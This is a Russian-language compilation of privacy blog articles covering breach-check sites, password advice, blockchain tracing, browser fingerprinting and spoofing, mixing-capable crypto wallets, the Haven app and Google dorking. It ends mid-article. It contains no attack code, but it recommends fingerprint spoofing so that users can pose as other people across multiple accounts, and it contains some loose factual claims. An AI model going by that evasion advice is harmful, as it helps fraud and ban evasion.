Никогда нельзя недооценивать анонимность, ваша безопасность с легкостью может быть подорвана в любой момент. Ежесекундно утекает информация и данные с ваших устройств, а вы ничего не можете с этим поделать. Или можете? В этой статье вы узнаете, как определить, что произошла утечка данных, и что с этим делать.

https://i.gyazo.com/ed64c26530b30b21def4609b6bd9dcaf.jpg

За последние годы многие пользователи смирились с тем, что с их телефонов и компьютеров отправляется большое количество данных в различные сервисы, которые он использует. Такой сбор данных выгоден компаниям для совершенствования своего продукта и создания персонализированной рекламы.

Если это не так сильно беспокоит вас, то следует знать, что помимо компаний, собирающих информацию, ваши данные могут быть украдены и слиты злоумышленниками. И это уже повод начать бить тревогу.

А вы уверены, что вы не стали одной из многих жертв хакеров, чьи пароли стали всеобщим достоянием? Давайте это проверим.

Сервисы для проверки паролей на предмет утечки:

1. Have I been pwned?

https://i.gyazo.com/46741326a468ae3365212e056d95ca56.jpg

Самый популярный сайт для проверки возможных утечек. Have I been pwned - это та же поисковая система, только с реверсивным поиском для проверки вашей почты и паролей в бесчисленной базе данных. Для того, чтобы выяснить попали ли ваши данные в руки злоумышленников, введите email, пароль и система выдаст эту информацию. Данный сервис был создан после одной из самых провокационных утечек, а именно, когда в 2013 году в сеть попали данные свыше 153 миллионов пользователей Adobe.

2. DeHashed

https://i.gyazo.com/41cffade2d36177c9d8aa83e51ffddbc.jpg

Сервис DeHashed создавался не только для простых пользователей, но и для компаний, журналистов, экспертов по безопасности и для всех, кто хочет сразу же узнавать о сливах данных. DeHashed осуществляет поиск по базам украденных персональных данных. С его помощью можно делать запрос по IP-адресам, логинам, паролям, телефонным номером, email адресам и др.

3. Sucuri Security Scanner

https://i.gyazo.com/26b0c0b89b503d6f7c3dc4b3cdc78af6.jpg

Sucuri Security Scanner отличается от двух предыдущих сервисов, так как он ищет не только слитые логины и пароли, но и проверяет целые сайты на возможные хакерские атаки и утечки данных.

4. LeakCheck

https://i.gyazo.com/706385f6152d37fa0d687a9fed7a230a.jpg

С помощью поиска на сайте LeakCheck вы можете узнать, был ли украден ваш пароль от email. Введите почтовый адрес, если произошла утечка, то сервис покажет пароли, которые находятся во всеобщем доступе.

5. SpyCloud

https://i.gyazo.com/d8c369a3afca23a553bf1f84cd99fdba.jpg

SpyCloud имеет огромную базу данных, в которой также может оказаться ваш пароль или другие данные.

6. Firefox Monitor

https://i.gyazo.com/b1d86ea66e5d34052f644d1d6164f96b.jpg

Сервис Firefox Monitor разработан компанией Mozilla и представляет собой поиск по базе данных слитых паролей. Помимо этого, вы можете пройти регистрацию, чтобы первым быть в курсе возможных утечек.

7. GhostProject

https://i.gyazo.com/2eb47da3ab276fced7d3b0813e5a4735.jpg

И закрывает наш топ сервис GhostProject, который может похвастаться многочисленной базой в 1.5 млн слитых данных. Но это еще не все, так как база регулярно пополняется новыми утекшими данными.

Итог

Стоит с осторожностью и внимательностью относится к защите своих данных, ведь информация постоянно копируется, перехватывается и сливается без вашего ведома. О том, как действовать, если вы обнаружили себя в базе утекших данных, и что делать, чтобы этого не повторилось, мы расскажем в следующей части.

https://i.gyazo.com/2ad61c3bca07f490ad529906f31538c6.jpg

Вступить в наш чат



В первой части мы поделились с вами сервисами, которые помогают определить, попали ли ваши данные в руки хакеров или нет. Если логины и пароли попали в базу с утечками, то сайты это покажут. Но, что же дальше делать с этой информацией и как впредь обезопасить себя от взлома? Об этом расскажем в этой статье.

Как предотвратить утечку данных?

https://i.gyazo.com/f9a2fc1cd9966f0f3f6c68cd95d8a440.jpg


Создайте надежный пароль. В идеале он должен иметь от 20 до 40 символов и храниться только у вас в голове. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение - имена, псевдонимы, клички. Фразы и памятные даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.

Используйте разные пароли. Это, пожалуй, один из важных и ключевых моментов. Ведь многие пользователи пренебрегают этим правилом, используя один пароль для всего на свете. Чем это грозит? Если ваш пароль попадет в руки злоумышленника, то он получит доступ ко всем сервисам, что захочет. Поэтому никогда так не делайте, используйте для разных сервисов различные комбинации.

Меняйтесь пароли. Вдобавок к предыдущему пункту, в целях профилактики необходимо регулярно менять пароли, хотя бы раз в год. И, что более важно, не используйте старые пароли, так как вы снижаете вашу степень защиты.

Подключите двухфакторную аутентификацию. Например, пароль + СМС код. Такая комбинация не даст злоумышленникам получить доступ к вашему аккаунту, даже если у них будет пароль для входа. Такая мера значительно уменьшает шанс взлома. Помимо этого, сервисы, работающие с двухфакторной аутентификацией, как правило, оповещают вас, если была попытка входа в ваш профиль.

Не доверяйте ненадежным сервисам. Перед тем, как вводить свои данные на каком-нибудь сайте, внимательно изучите его, если вас мучают сомнения, то не рискуйте. Старайтесь указывать лишь необходимую информацию, нужную для работы сервиса.

Используйте лицензионные антивирусы. Это поможет уберечь ваш ПК от вирусов, тем самым снизив риск утечки личных данных.

Избегайте общественных сетей Wi-Fi, так как данные зачастую сливаются именно таким способом. Взломать и перехватить данные по Wi-Fi не составляет труда даже для новичка в этом деле, что уж тут сказать про профессионала. Но если все-таки вы вынуждены подключиться к общественной сети, то делайте это только с VPN - он переадресует ваши данные и убережет от взлома.
https://i.gyazo.com/047324aefb852b843315ccbb2c8bf4ba.jpg

Что делать, если утечка уже произошла?

Первое, что нужно уяснить, так это то, что нет необходимости впадать в панику, если вы узнали, что ваши данные слили. "Это еще почему?", - спросите вы. А потому, что утечки и сливы происходят в б̶о̶л̶ь̶ш̶о̶м̶ нереально огромном количестве. В открытую базу данных за раз могут попасть данные тысячи человек, а иногда даже миллиарда. Так что вероятность того, что заинтересуются именно вами крайне мала. Скорее всего вы уже 100 раз узнаете об утечке.

1. Если вы нашли себя в базе слитых данных, то вам нужно посмотреть, с какой утечкой это связано. В списке могут отображаться как утечки по сайтам, так и не привязанные к какому-то конкретному ресурсу. Каждый пункт сообщает, когда произошла утечка.

https://i.gyazo.com/45edfb6039ee574db9045b8d41209149.jpg

2. Когда вы выяснили, какие именно данные утекли в сеть, самое время начинать смену не только паролей, но и желательно самих email адресов. Если вы использовали разные пароли для сервисов, то вы сразу сможете понять, где была утечка, и вам не придется везде менять данные. Теперь вы еще больше понимаете, для чего нужны разные пароли для входа на каждый сервис.

Заключение

Если вам кажется, что вас никогда не взломают, и что ваши пароли надежные и не пробиваемые, то это не так. К несчастью, никто не может быть застрахован от утечки данных. Риск, того, что вас взломают, даже если вы будете следовать всем советам, все равно остается. Но это не значит, что нужно упрощать жизнь хакерам, всегда нужно быть начеку и принимать необходимые меры защиты.

https://i.gyazo.com/13c48519fbe43e6d0f796d4207f1264f.jpg

Вступить в наш чат

Вся информация о цифровых активах навсегда остается в блокчейне, поэтому с помощью специальных инструментов для анализа транзакций, можно задеанонить пользователей.Если вы из вышесказанного ничего не поняли, то давайте разбираться.

Блокчейн - это непрерывная цепочка блоков, где содержатся все записи о сделках. Это основа всех криптовалют.

Блокчейн-анализ -это процесс наблюдения за транзакциями и самими участниками в блокчейне для отслеживания и проведения расследования по криптовалюте.

https://i.gyazo.com/7ab578a5cfb9f2dffa328d2318ef7aaa.jpg

То, что попало в блокчейн остается там навечно

Блокчейн - это длинная цепочка разных информационных блоков, где каждый блок содержит данные о предыдущем. Что это значит? А то, что если транзакция была добавлена в блок, она хранится там отныне всегда, так как ее нельзя удалить. Но хранится в блокчейне информация о транзакциях, а не данные пользователей, поэтому установить связь между ними не так то просто.

Глобальное распределение

В основе блокчейна лежит система глобального распределения хранения данных. Как это понимать? Копия базы блокчейна хранится одновременно на всех устройствах, находящихся в его сети. Учитывая тот факт, что удалить данные из блокчейна не представляется возможным, то для того, чтобы избавиться от цифрового следа вам придется их удалить сразу на всех устройствах по всему миру, что на практике нереально.

Цифровой след

Каждая транзакция в блокчейне имеет свой адрес - TxID. С его помощью любой желающий может посмотреть сумму, откуда активы пришли и куда ушли. Узнать сохраненную информацию в блокчейне можно тут.

Расследования

Программное обеспечение для анализа блокчейнов играет важную роль в расследованиях, связанных с криптовалютами. Это дает возможность правоохранительным органам отслеживать тразакции и определять мошенников. Например, преступник использует некий сервис для конвертации криптоактивов в фиатные деньги. С помощью инструментов для анализа блокчейна можно определить используемый криптосервис, и если в нем реализована строгая политика KYC, это даст возможность идентифицировать реального преступника.

Компании, занимающиеся блокчейн-анализом, предоставляют также мощные инструменты визуализации для вручную управляемых исследований и реализуют различные алгоритмы кластеризации для идентификации криптосервисов.

Инструменты блокчейн-анализа

Инструменты для блокчейн-анализа - это способы для отслеживания транзакций и проведения расследований. Их задача - объединить транзакции в блокчейне и людей, совершавших эти переводы.

Основные функции инструментов для блокчейн-анализа:

Классификация адресов - одним из основных применений программного обеспечения является соотнесение блокчейн-адресов с реальными личностями. Для их определения, инструменты анализа блокчейнов используют такие методы, как алгоритмы кластеризации, веб-скрейпинг, мониторинг баз данных о мошенничествах и пылевые атаки.

Мониторинг транзакций и анализ рисков - блокчейн-анализ позволяет контролировать каждую транзакцию и оценивать риски исходя из того, откуда идут средства и какая история кошельков отправителя или получателя. Анализ рисков основывается на множестве параметров, таких как сумма транзакции, происхождение средств и история денежных потоков.

Инструменты для исследований и анализа — предоставляют средства визуализации для составления графов транзакций с целью обнаружения связей между ними.

̶А̶н̶о̶н̶и̶м̶н̶о̶с̶т̶ь̶

Все убеждены, что блокчейн и криптовалюты полностью анонимны. Но достаточно ли, чтобы скрыть преступление? В целом система действительно является анонимной и не имеет связей с лицами реального мира. Но в процессе использования криптовалюты сами пользователи раскрывают себя, связывая личность с адресом. "Каким образом?", - cпросите вы. Достаточно подтвердить свою личность или же указать кошелек на другой бирже и вся информация сохранится в базах данных.

С первого взгляда криптовалюта кажется идеальным решением для мошенников, но выходит, что система достаточно прозрачна, чтобы использовать ее в преступных целях.

Если кто-то совершил противозаконное действие, то его след не исчезнет из блокчейна, даже если это было очень давно. Да, вы можете отрицать, что система не идеальна, и что невозможно задеанонимизировать каждого мошенника. Отчасти это так, но, как мы знаем, алгоритмы постоянно совершенствуются, и поэтому нельзя ни в чем быть уверенным.

https://i.gyazo.com/27edf476a16a4e3eba8a8ed2f4404a4a.jpg

Вступить в наш чат



Каждому пользователю в интернете присваивается уникальный идентификатор или отпечаток пальца. Он содержит много информации о настройках и функциях браузера пользователя и используется для идентификации пользователя. В отпечаток входят десятки разных параметров — от языка, который вы используете, и временной зоны, в которой находитесь, до списка расширений и версии вашего браузера. Сюда же может входить информация об операционной системе, об объеме оперативной памяти, разрешении экрана устройства, параметрах шрифтов и многом другом. Эта комбинация данных называется fingerprint, а сбор этих данных называется фингерпринтингом.

https://i.gyazo.com/b3c485d6aa2a5be0dcbb806cfce94cca.jpgВиды отпечатков


User agent - это элемент браузера, отражающий набор информации об устройстве. Включает браузер, программное обеспечение, устройство и многое другое;

Язык браузера;

IP и данные провайдера;

Canvas;

Cookie;

Часовой пояс;

Расширения;

Шрифт;

Плагины и их характеристика.
Cуществует более 50 параметров.

Цифровой отпечаток браузера представляет собой 32-битное число шестнадцатеричной системы. Полученный отпечаток браузера позволяет отслеживать пользователей в сети Интернет с точностью до 94%.


Важно: Отпечатки, как и User agent, в совокупности ведут лишь к уникализации, но никак не к деанонону пользователя.


Сookies и fingerprints - в чем разница

Файлы cookie являются неотъемлемой частью многих онлайн-транзакций. Владельцы сайтов считаю их одним из основных инструментов, используемых для отслеживания активности клиентов. Но этот метод уже является устарелым и малоэффективным.
На это есть несколько причин. Во-первых, любой пользователь может отклонить файлы. Во-вторых, стоит включить "режим инкогнито" и ваше присутствие станет на сайте незаметными. Файлы cookie отправляют данные не только владельцу ресурса, но и самому пользователю, поэтому всегда есть возможность оградить себя от них.
Но с фингерпринтами все стоит иначе. Этот метод анализирует информацию, отправляемую браузером на сайт, который посещает пользователь. Оцениваются несколько типов данных, таких как языковые настройки, шрифты, часовой пояс, разрешение экрана, установленные плагины и версии программного обеспечения. Все вместе это дает цельную картину о конкретном человеке.


Важно понимать, что смена IP-адреса не защищает ваш фингерпринт.


Опасности цифровых отпечатков


Деанон - причина номер один, из-за которой пользователи должны быть осторожны. Система помечает ваш компьютер специальной цифровой меткой в виде хэш-суммы, снятой по специальному алгоритму без вашего ведома. Таким образом, пользователь может быть деанонимизирован.

Fingerprints как регенератор cookies. Многие веб-сайты используют так называемые Flash LSO super cookies, которые позволяют восстанавливать куки, даже при их удалении. Отпечатки пальцев браузера могут не только восстанавливать всю библиотеку файлов cookie, но и отслеживать пользователей по их основной сетевой информации. В этом случае процесс очистки системы cookie становится бессмысленным и сайт все равно распознает клиента.
В следующих статьях вы узнаете:


Как понять, что сайт снимает фингерпринт;

Как изменить свой фингерпринт;

Как проверить свой отпечаток браузера.

https://i.gyazo.com/495cc2d636cdce890cc8d794bb6da122.jpg

Вступить в наш чат

Ранее мы рассказали, что такое фингерпринт. В этой статье разберем для чего он используется, как сайты снимают отпечаток браузера и законно ли то.

https://i.gyazo.com/b3c485d6aa2a5be0dcbb806cfce94cca.jpg

Для чего используется фингерпринт

Сайты собирают цифровые отпечатки своих посетителей, чтобы:

Защита от мошенничества и спуфинга. Например, если система видит по отпечатку, что пользователь посещает сайт из непривычного места или незнакомого устройства, она может заподозрить, что аккаунт был взломан. В результате ваша учетная запись будет заморожена, пока вы лично не восстановите доступ.

Бороться с ботами. Например, если кто-то попытается создать несколько учетных записей из одного и того же браузера, в какой-то момент соцсети его забанят.

Показывать рекламу. Данные фингерпринта: информация о местоположении, языке и т.д. может использоваться сайтом для показа рекламы или обмена с другими сайтами. К сожалению, эта информация может сыграть против вас.
Как понять, что сайт снимает фингерпринт

Фингерпринтингом занимаются все крупные сайты, рекламные площадки, поисковики и соцсети. Они хотят собирать и знать как можно больше информации о своих пользователях.

Это двухуровневый процесс, который работает как на стороне сервера, так и на стороне пользователя.

На стороне сервера

Логи доступа к сайту

В этом случае речь идет о сборе данных, отправляемых браузером. Как минимум это:

Запрошенный протокол.

Запрошенный URL.

Ваш IP.

Referer.

User-agent.
Заголовки

Веб-серверы получают их из вашего браузера. Заголовок важен для того, чтобы запрашиваемый сайт работал в вашем браузере.

Например, информация в заголовке позволяет сайту узнать, используете ли вы ПК или мобильное устройство. В последнем случае вы будете перенаправлены на версию, оптимизированную для мобильных устройств. К сожалению, эти же данные попадут в ваш отпечаток.

Куки

Они играют очень важную роль в логировании. Так, вам обычно нужно решить, позволить ли вашему браузеру обрабатывать файлы cookie или полностью их удалять.

В первом случае сервер получает просто огромное количество данных о вашем устройстве и предпочтениях. Даже если вы не принимаете файлы cookie, сайт все равно будет собирать некоторые данные о вашем браузере.

Canvas Fingerprinting

В этом методе используется элемент холста HTML5, который WebGL также использует для рендеринга 2D- и 3D-графики в браузере.

Этот метод обычно заставляет браузер "принудительно" обрабатывать графическое содержимое, содержащее изображения, текст или и то, и другое. Этот процесс выполняется в фоновом режиме и невидим для вас.

Когда процесс завершен, canvas fingerprinting преобразует графику в хэш, что делает его уникальным идентификатором, упомянутым выше.

Таким образом, возможно получить следующую информацию о вашем устройстве:

Графический адаптер;

Драйвер графического адаптера;

Процессор (если нет выделенного графического чипа);

Установленные шрифты.
Логирование на стороне пользователя

Здесь подразумевается, что ваш браузер передает большое количество данных с помощью:

Adobe Flash и JavaScript

Когда JavaScript включен, данные о ваших плагинах и спецификациях железа передаются третьим лицам.

Если установлен и включен Flash, он предоставит еще больше данных, такие как:

Ваш часовой пояс;

Версию ОС;

Разрешение экрана;

Полный список установленных шрифтов.
Законно ли собирать фингерпринты

В отличие от файлов cookie, сбор которых без согласия пользователя невозможен, для фингерпринтов такого требования пока нет. Поэтому ограничений на сбор отпечатка браузера нет.


Читайте в следующей статье, возможно ли изменить свой отпечаток браузера и как это сделать.

Как изменить свой фингерпринт

https://i.gyazo.com/3f3eba5d30206b823a9825ab884ea0b5.jpg
Вступить в наш чат
Это третья часть серии статей про отпечатки браузера. Из прошлых двух статей мы выяснили:


Фингерпринт – это система слежения за пользователями в интернете, основанная на сведениях из браузера и ПК.

Отпечатки собирают большой объем информации из настроек и браузера, и компьютера в целом. Это языковые параметры, часовой пояс, разрешение экрана, наличие конкретных плагинов и многое другое.

Если браузер помечен отпечатками, удаление cookies даст ограниченный эффект. Более эффективно полностью изменить настройки браузера и системы. Настройки не должны быть слишком уникальными, поскольку это приведет не к уменьшению, а к увеличению узнаваемости браузера.

Полностью защититься от фингерпринтинга нельзя, но можно снизить уникальность.
Читать статьи полностью:
1 часть
2 часть
https://i.gyazo.com/b3c485d6aa2a5be0dcbb806cfce94cca.jpg

Кому нужно менять свой фингерпринт

Фингерпринт необходимо менять:


Арбитражникам, маркетологам и другим диджитал-специалистам, которые пользуются несколькими аккаунтами. Меняя свой фингерпринт, они могут выдавать себя за других пользователей.

Всем, кто связан с финансовым бизнесом: криптовалюты, беттинг и др. Точно так же - выдавать себя за разных пользователей с помощью разных фингерпринтов.

Всем, кто хочет защитить свои данные в интернете.
Как изменить свой цифровой отпечаток

вручную

Для этого вам нужно заменить или отключить большую часть данных, из которых состоит ваш отпечаток пальца. Например:

Удалите cookie перед началом новой сессии;

Отключите Flash и JavaScript. Если их отключить, то сайт не сможет проанализировать некоторые данные, из которых состоит цифровой отпечаток, например шрифты;


Установите другой язык операционной системы;

Измените разрешение экрана устройства;

Установите другой язык браузера и измените масштаб веб-страницы;

Отключите Canvas. Например, с помощью CanvasBlocker;

Измените часовой пояс устройства.
Преимущество этого метода в том, что он бесплатный и не требует дополнительного программного обеспечения, но вам нужно будет постоянно тратить время на выполнение одних и тех же действий. Кроме того, сайты регулярно увеличивают объемы анализируемых данных, а значит вы не в состоянии предусмотреть все нюансы, потому фингерпринт все равно смогут распознать.

Веб-расширения

На рынке уже не первый год есть продукты, которые помогают замаскировать реальный цифровой отпечаток. Расширения помогают повысить уникальность отпечатка браузера.

Вот что можно рекомендовать:


Chameleon - модификация значений user-agent. Можно установить периодичность "раз в 10 минут", например.

Avast Antitrack устраняет трекеры и скрывает фингерпринты, но является платным.

Trace - защита от разных вариантов сбора отпечатков.

User-Agent Switcher - делает примерно то же, что и Chameleon.

Disconnect.me также обещает полную защиту от слежки в интернете.

Canvasblocker - защита от сбора цифровых отпечатков с canvas.


VPN

VPN - это самый простой способ обойти интернет запреты в некоторых странах, и защитить себя в интернете. Он изменяет ваш IP, тем самым маскирую вашу личность, но не скрывает данные о вашем браузере и его цифровом отпечатке. Также он не влияет на cookie.

По этой причине VPN недостаточно для арбитража трафика и работы с криптовалютой. Его нужно использовать в тандеме с другими методами.

Почитайте нашу статью о том, как выбрать VPN.

Антидетект браузеры

Это специальные программы, способные замаскировать фингерпринты. Вы можете настроить свой собственный отпечаток пальца или получить готовый из браузера. Все популярные антидетект браузеры хорошо справляются с этим, поэтому пользователи чаще, как правило, обращают внимание на стоимость, удобство и дополнительные функции. Стоит понимать, что полностью защититься от фингерпринтинга невозможно. Однако, объем информации, собираемой сторонними сервисами, может быть уменьшен.

Браузер Firefox

Этот браузер хорошо маскирует данные пользователей. Недавно разработчики защитили пользователей Firefox от стороннего сбора отпечатков пальцев. Но вы можете повысить уровень защиты еще больше следующим способом:

Для этого требуется зайти в настройки браузера, путем ввода в адресной строке «about:config». Затем выбираем и меняем следующие опции:


webgl.disabled — выбираем «true».

geo.enabled — выбираем «false».

privacy.resistFingerprinting — выбираем «true». Эта опция дает базовый уровень защиты против сбора отпечатков браузера. Но наиболее эффективна она при выборе и других опций из списка.

privacy.firstparty.isolate — меняем на «true». Эта опция позволяет блокировать cookies от first-party доменов.

media.peerconnection.enabled — необязательная опция, но, если вы работаете с VPN, ее стоит выбрать. Она дает возможность предотвратить утечку WebRTC и демонстрацию своего IP.
Также можно выделить и другие браузеры как AdsPower, Multilogin и Linken Sphere, которые подменяют данные пользователя и минимизируют след в интернете.

Выделенные серверы

Использование дедиков (от слова dedicated server) до сих пор считается одним из самым эффективных способов сохранения анонимности. Дедик - это физически отдельная машина, с которой никакие данные не передаются на вашу основную или рабочую.


Плюсы: Настройка HTTP/SOCKS-прокси или SSH/VPN-соединения на выбор; Контроль истории запросов; Спасает при атаке через Flash, Java, JavaScript, если использовать удаленный браузер;

Минусы: Относительно высокая стоимость;

Необходимы технические знания для правильной настройки.
Такие виртуальные компьютеры являются новыми и чистыми для интернета, а их популярность и эффективность во многом обусловлены их круглосуточной работой и отсутствием распространения какой-либо информации о конечных пользователях или характеристиках их компьютеров.



Узнайте в следующей статье как проверить свой отпечаток браузера.

https://telegra.ph/Kak-izmenit-svoj-fingerprint-04-24

https://i.gyazo.com/a6c8a51f00c7499140885ef35328963d.jpg

Вступить в наш чат



Криптовалюта все больше и больше входит в повседневную жизнь человека. На сегодняшний день почти все услуги можно оплатить криптовалютой. Криптовалюта, в отличие от обычный денег, не хранится в реальном или виртуальном кошельке, а только в блокчейн.


В этой статье мы подробно ознакомились с криптокошельками, рассмотрели их различные виды и сравнили между собой. Коротко напомним о том, какие бывают виды криптокошельков.

Типы кошельков

Все криптокошельки можно объединить в несколько основных видов:


кошельки для ПК;

для мобильных устройств;

аппаратные;

бумажные кошельки;

онлайн-кошельки.
Несмотря на многообразие видов, крайне сложно выбрать надежный и безопасный криптокошелек, но мы вам с этим поможем.

Зачем всё это надо?

Нынешняя финансовая система без конца диктует, установленные правила, как ВАМ можно, а как нельзя потратить ВАШИ собственные деньги. Поскольку биткоин называют "устойчивый к цензуре", это дает своего рода гарантии, что ни правительство, ни ваш банк не смогут ограничить ваши действия.

Как лучше хранить крипту?

Какой криптокошелек лучше выбрать? Это зависит от различных условий. Самое главное - это безопасность и надежность, проверенная временем. Ну и, конечно же, ваши потребности. Например, если вам нужно хранить много денег, рекомендуется купить аппаратный кошелек, а если вы торгуете на бирже, то можно хранить криптовалюту прямо на ней, не платя комиссию за перевод.

https://i.gyazo.com/af4e6bdbea45951a63e1b0c7be66783e.jpg

Топ-5 криптокошельков для биткоина

1. Electrum

Electrum - один из самых популярных кошельков для BTC.


Кошелек имеет открытый исходный код и позволяет совершать массовые платежи, используя автономное, холодное хранение. Обладает двумя уровнями шифрования.

Electrum классифицируется как легкий кошелек. Нет необходимости загружать сеть блокчейна, а сама установка будет завершена за считанные минуты.

Electrum - один из первых криптовалютных кошельков, история которого насчитывает более 10 лет. Этот проект имеет хорошую репутацию и уже много лет является одним из лидирующих на рынке криптовалют.

Он работает как в десктопной версии, так и в мобильном приложении. Electrum совместим с системами Windows, Linux, OSX и Android.


https://i.gyazo.com/bc7fee8a91fd452e5b608cc1fd1ad649.jpg

2. Exodus

Exodus – удобный мобильный кошелек с простым функционалом.


Exodus поддерживает функцию стейкинга и обмена криптовалют, а также хранение более ста различных криптовалют.

Из плюсов можно выделить простоту и удобство в использовании, понятный интерфейс, а также встроенный обмен криптовалюты и синхронизацию кошельков на нескольких устройствах.

Мобильный кошелек имеет ограниченный функционал по сравнению с десктопным клиентом, но для новичков есть все необходимые функции.

Exodus имеет поддержку 24/7.


https://i.gyazo.com/30af9e0084ea1c2280e704cb2f9d978b.jpg

3. Samourai

Samourai - это кошелек BTC для пользователей Android с упором на конфиденциальность. Созданный в 2015 году, Samurai Wallet является одним из первых клиентов, поддерживающих обновления сети биткойнов Segregated Witness. Кроме того, Samurai имеет множество дополнительных функций:


Модуль Dojo, который позволяет развернуть полный узел plug-n-play;

STONEWALL - опция, удаляющая цифровой след из метаданных и защищающая пользователя от деанонимизации;

PayNym - маскирует адрес от всех, кроме отправителя и получателя;

Scrambled PIN - защищает захват экрана шпионскими программами;

Удаленные SMS - позволяют стереть и восстановить учетную запись, если ваш телефон был потерян или украден;

Whirlpool или водоворот, который разрывает связь между входом и выходом транзакции, что затрудняет отслеживание.

Samurai готов постоять за вашу приватность. Поскольку функция хранилища полностью отсутствует, вы всегда можете управлять своими закрытыми ключами. Для начала работы с Samourai вам не нужно вводить свой адрес электронной почты или подтверждать свою личность, просто установите его.


https://i.gyazo.com/ddbd196235e9a6b0310ad14cf831b0c1.png

4. Wasabi

Wasabi - проверенный временем десктопный кошелек.


Он имеет открытый исходный код и использует CoinJoin (специальный тип биткоин-транзакций, при котором несколько пользователей объединяются, чтобы соединить свои монеты в одну транзакцию). Этот протокол значительно повышает анонимность держателей монет. Эта концепция существует с момента появления биткоина, но лишь немногие криптокошельки ее реализовали.

Особенностью Wasabi является интеграция с холодными аппаратными кошельками, а также с сетью Tor, что гарантирует безопасность и анонимность.

Васаби доступен на платформах Windows, Mac OS и Linux.


https://i.gyazo.com/480229c7866557a522fb3f2c5969dd72.jpg

5. Cake Wallet

Cake Wallet - один из лучших кошельков для пользователей iOS. Он позиционирует себя в качестве кошелька №1 в сфере безопасности хранения средств. Только владелец кошелька отвечает за личные ключи и может ими управлять, таким образом, Cake безопаснее, чем большинство настольных кошельков или веб-кошельков.


Имеет открытый исходный код;

Поддерживает нескольких валют XMR, BTC и LTC;

Встроенный обменник. В приложении можно конвертировать ADA, ВСН, DAI, EOS, USDT, TRX и другие монеты;

Возможность купить криптовалюту в самом приложения;

Поддержка нескольких кошельков и учетных записей в одном приложении;

Возможность создания резервных копий кошелька локально или в облаке.

https://i.gyazo.com/ad645a5ebf0de21eba5d0e15fc772418.jpg


Вступить в наш чат



Наверняка у каждого из вас есть как минимум один ненужный телефон, который пылится на полке. Но вы будете удивлены, узнав, что ему можно найти очень хорошее применение. Превратите его в удаленную систему наблюдения с детектором движения и возможностью записи происходящего.

https://i.gyazo.com/020602b860cff8a4230a7e3a00dfe54c.jpg

Haven

Как же это сделать? Сегодня мы расскажем про одно очень необычное приложение, которое предназначено как раз для это цели - Haven. Его создатель - Эдвард Сноуден, известный IT-специалист и спецагент.

Это приложение на базе Android использует встроенные сенсоры для создания системы наблюдения и защиты личного пространства. Haven превращает любой Android-телефон в детектор движения, звука, вибрации и освещённости, предупреждая о нежданных гостях.

Haven применяет сквозное шифрование для защиты данных. В отличие от похожих платных приложений, Haven не использует сомнительные облачные хранилища, а все уведомления отправляет через Signal и Tor.

Установка

Так как Haven доступно только для пользователей Android, любителям iOS рекомендуют приобрести дешевый Android-смартфон и использовать его как шпионское устройство, получая уведомления на свой iPhone.



Скачать приложение можно тут.


Когда вы запустите его, вам будет предложено установить границу шума и движения, отрегулировав их в зависимости от исходящих звуков. Например, исключите срабатывание на стиральную машинку или работающий холодильник. В качестве сенсора движения используется фронтальная или задняя камера. Соответственно, телефон можно спрятать в укромном месте, так чтобы камера записывала происходящее.

https://i.gyazo.com/4a7c2eab72bdc2b6b25f7d04de7b2d77.jpg

Приложение Heaven также предлагает связать ваше устройство, добавив номер для получения мгновенных оповещений, которые будут поступать по защищённым каналам. Доступ к логам предоставляется в удалённом режиме через Tor, то есть можно почти в реальном времени смотреть и слышать, что происходит в доме. В логах сохраняются данные со всех сенсоров, фотографии и звуковые файлы. Любую информацию можно посмотреть, удалить или быстро обнародовать через Signal, WhatsApp, Gmail, Google Drive или другой файлохостинг.

Приложение использует ниже указанные сенсоры, а затем записывает в журнал событий на устройстве:


Акселерометр: физическое перемещение самого телефона и вибрация;

Камера: движение в поле зрения фронтальной или задней камеры телефона;

Микрофон: посторонние звуки поблизости;

Освещение: изменения в освещении, определяемые фоточувствительным сенсором;

Питание: определяет потерю питания или отсоединение телефона от сети питания.
Итог

Это приложение станет незаменимым для параноиков, в хорошем смысле этого слова и просто для людей, которые ценят безопасность. Haven поможет выявить проникновение, будь то в ваш дом или номер в отеле и остановить злоумышленника. Без подобной системы охраны нельзя быть уверенным, что в ваше отсутствие вам ничего не грозит. Сам Эдвард Сноуден выразился:

«Haven не просто прикрывает вас, она дает душевное спокойствие».

Вступить в наш чатЧто такое Google Dork?
Google Dork, также известный как Google Dorking или Google Hacking, стал ценным ресурсом для исследователей безопасности. А вот для обычного человека Google - это всего лишь поисковый сервис для картинок, видео, новостей. Но на сегодняшний день Google является одним из самых полезных инструментов для взлома и кражи информации, который используют хакеры.

Google Dork - это метод взлома компьютера, использующий приложения Google, такие как Google Search. Делается это очень просто через дыры в поисковом запросе. Иначе говоря, Google Dork - это использование возможностей собственной поисковой системы Google для поиска уязвимых приложений и серверов.

Как работает Dork?
Например, вы решили купить камеру наблюдения для того чтобы смотреть с телефона, что происходит дома, пока вы на работе. Все, что вам нужно сделать - это загрузить приложение на телефон или планшет, и вы можете получить изображение с камеры видеонаблюдения в реальном времени. Однако, человек, который обладает знаниями, может перехватить запись с камеры с помощью одного лишь гугла. Как это возможно? К сожалению или к счастью, Google не может защитить устройства в интернете, в особенности те, которые работают на серверах HTTP или HTTPS. В результате, в поисковик попадают все те вещи, которые там быть не должны - данные от учетных записей пользователей, списки адресов email, открытые веб-камеры и многое другое.

Если владелец веб-сайта не использует файл robots.txt для блокировки определенных ресурсов, то Google проиндексирует всю информацию, которая находится на нем. Логично предположить, что через какое-то время любой человек в мире получит доступ к этой информации, если будет знать, что искать и как искать.

Предотвращение Google Dork
Но существует множество способов, как избежать попадания в руки Google Dork. Это делается для того, чтобы избежать индексации вашей конфиденциальной информации поисковым системам.

Шифрование. Не забудьте про шифровку вашей личной информации (пользователя, пароли, данные кредитных карт, почту и т.д.). Вы можете предотвратить попадание ваших файлов в Google Dork, зашифровав их.

Проверка Dorks. Постоянно проверяйте уязвимости на сайте, они часто используются для поиска наиболее популярных запросов Google Dorks. Отправляйте регулярные запросы на свой сайт, чтобы узнать, сможете ли вы отыскать какую-либо важную информацию до того, как это сделают хакеры. В базе данных Exploit Db Dorks вы найдете большой список популярных dorks.

Удаление. После того, как вы обнаружили уязвимый контент, вам необходимо отправить запрос на удаление с помощью Google Search Consolet.

Robots.txt. При помощи файла robots.txt блокируйте доступ к конфиденциальному контенту.

Применение конфигурации robots.txt для устранения Google Dorks
Самый лучший способ обезопасить себя от Google dorks – это использовать файл robots.txt. Рассмотрим несколько примеров.

